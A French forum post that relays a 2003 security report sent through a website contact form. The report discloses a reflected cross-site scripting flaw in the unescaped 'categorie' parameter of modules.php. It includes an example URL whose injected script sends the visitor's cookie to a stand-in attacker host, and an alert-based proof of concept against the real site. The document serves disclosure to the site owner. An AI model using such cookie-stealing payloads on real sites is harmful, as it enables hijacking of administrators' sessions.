aidadomicil
 3011 
|  Posté : 21-06-2003 11:04
message reçu via le formulaire du site:
**** Message *****
>From : nosp1@hotmail.com
Code : 75000
Sujet : problème de sécurité
Msg : Bonjour,
Il semblerait qu\'il existe un problème de sécurité sur votre site en effet la variable : \"categorie\" dans module.php ne semble pas être défini par défaut et de surcroit pas modifié en passant dans les formulaire avec htmlspecialchars par exemple de plus cette variable étant active sur la page grace à un echo, je suppose, elle permet de faire executer du javascrit à celle-ci. Tout ceci ajouté à une identification permettrait à une personne mal intentionné de récupérer un cookie d\'un admin du site, grace à un mail malformé ou suivi d\'un lien du genre http://www.lesite.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>windowd.location.replace(\'http://www.hacker.com\'+!document.cookie!);</script>&num_ann=5
En espératn à vous avoir aidé quelques peu.
Cordialement
NoSP
Le lien ci-dessous ne fais rien d\'autre que d\'afficher votre cookie sur la page si vous êtes identifié, il est destiné à vous montrer le problème :
http://www.aidadomicil.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>alert(!document.cookie!)</script>&num_ann=5
**** Fin du message **** |
